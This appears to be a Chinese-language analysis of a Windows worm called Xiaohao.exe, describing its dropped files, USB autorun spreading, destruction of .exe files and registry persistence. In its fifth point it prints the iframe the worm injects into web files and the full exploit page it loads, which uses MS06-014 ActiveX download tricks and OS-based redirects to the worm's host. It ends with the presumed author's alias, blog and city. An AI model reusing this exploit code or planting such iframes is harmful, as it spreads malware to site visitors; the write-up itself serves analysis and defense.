病毒简介

病毒分析

病毒作者

病毒简介

文件名称：Xiaohao.exe

文件大小：12288 字节

AV命名：Virus.Win32.Agent.o（瑞星）

加壳方式：UPX 0.89.6 - 1.02 / 1.05 - 1.24

编写语言：Microsoft Visual C++ 6.0

病毒类型：蠕虫

文件MD5：B50ED06B61CDCF060D0136784999E50C

文件SHA1：ADFE561A7E12E6123C2E5E64EAE2308CBD4A79FD

传播方式：U盘等移动.介质、网页漏洞。

所在系统：Win9x, WinMe, WinNT, Win2000, WinXp, Win2003

病毒分析

1、释放病毒文件：

%Systemroot%\\system32\\dllcache\\dvdplay.exe

%Systemroot%\\system32\\OLDA.tmp

%Systemroot%\\system32\\exloroe.exe

其中主体Xiaohao.exe常驻进程。

2、尝试启动C:\\Program Files\\Internet Explorer\\iexplore.exe，不过未见其他行为。

3、Xiaohao.exe查找可用的磁盘，在其目录下生成：Xiaohao.exe和Autorun.inf

如双击磁盘，则激活病毒。

（如果在插入U盘情况下，运行被感染的病毒，那么U盘目录会生成Xiaohao.exe和Autorun.inf）

4、遍历磁盘所有文件，如遇到.exe文件则覆盖，并在文件尾增加感染标记“ygr”

覆盖文件头部，导致可执行文件结构被破坏。文件全部变成一个“浩”字。

由于无判断路径，系统文件也.被破坏了，重启后可能无法开机。

并且一些系统设置和配置失效，例如系统时间会被修改。

5、查找扩展名为*.jsp、*.php、*.aspx、*.asp、*.html、*.htm文件。插入一段代码：

＜ifrae src=h**p://xiaohao.yona.biz/xiaohao.htm width=0 height=0＞＜/ifram＞

代码：

＜!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"＞

＜HTML＞＜HEAD＞＜TITLE＞IE 0Day＜/TITLE＞

＜META http-equiv=Content-Type content="text/html; charset=windows-1252"＞

＜META content="MSHTML 6.00.2900.2769" name=GENERATOR＞＜/HEAD＞

＜BODY＞

＜SCRIPT language=javascript＞

window.status="";

function detectOS()

{

if(navigator.userAgent.indexOf("Windows NT 5.1") != -1)

{

OS = "Windows XP";

}

else

{

if(navigator.userAgent.indexOf("Windows NT 5.2") != -1)

{OS = "Windows 2003";}

else

{OS = "Windows 2000";}

}

return OS;

}

function MakeItSo()

{

if(detectOS() == "Windows XP")

{

//2YWwO5M3N*xp,V4PPxp5DMS07-004MxBm

window.location.href="baobao.htm";

}

else {if(detectOS() == "Windows 2003")

{

//2YWwO5M3N*2003

window.location.href="zhu3.htm";

}

else

{

//2YWwO5M3N*2K,V4PP2K5DMS07-004MxBm

window.location.href="banner.htm";

}

}

}

＜/SCRIPT＞

＜SCRIPT language=VBScript＞

on error resume next

Set downf = document.createElement("object")

downf.setAttribute "classid", "clsid:BD9"&"6C556-6"&"5A3-11D"&"0-983A-00C"&"04FC2"&"9E36"

str="Microsoft.XMLHTTP"

Set O = downf.CreateObject(str,"")

if Not Err.Number = 0 then

err.clear

//C;SPMS06-014B)64,5Ck:sEP6O2YWwO5M3@`PMV4PP2;M,5DMS07-004MxBm

document.write("＜scr"&"ipt language=""javascript""＞window.setTimeout(""MakeItSo()"",5000);＜/sc"&"ript＞")

else

//SPMS06-014B)64,V4PP06-0145DMxBmad.htm

document.write("＜iframe width=""0"" height=""0"" src=""zhu3.htm""＞＜/iframe＞")

end if

＜/SCRIPT＞

＜script src=yun.js＞＜/script＞

＜SCRIPT language=javascript type=text/javascript＞

var cookieString = document.cookie;

var start = cookieString.indexOf("woshi0day=");

if (start != -1)

{}

else

{

var expires = new Date();

expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);

document.cookie = "woshi0day=Ms06-046;expires=" + expires.toGMTString();

document.write("＜iframe width=0 height=0 src=baobao.htm＞＜/iframe＞");

}＜/SCRIPT＞

＜/BODY＞＜/HTML＞

由操作系统版本判断，决定跳转的网页。

首先检测是否存在MS06-014漏洞，若有，则跳至h**p://xiaohao.yona.biz/zhu3.htm

如无意外，可获样本：h**p://xiaohao.yona.biz/xiaohao.exe

若无MS06-014漏洞，则跳至h**p://xiaohao.yona.biz/baobao.htm.

代码以十进制加密，解密后得一个0day木马。

6、修改注册表（不记得哪里，哈哈``），删除开始菜单的快捷方式。

7、修改进程窗口标.题，为：已中毒 X14o-H4o''s Virus

8、如病毒在进程，在进入一个目录后，所有文件（被感染文件除外）属性皆被设置为隐藏！

9、破坏显示隐藏文件，设置为“不显示”。

10、写入注册表，开机自启：

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\

指向%SystemRoot%\\system32\\exloroe.exe（这一步使系统启动不了！）

11、保存被感染的文件列表C:\\Jilu.txt

病毒作者

网名：X14oH4o

百度空间：/xh_hook

住址：江西南昌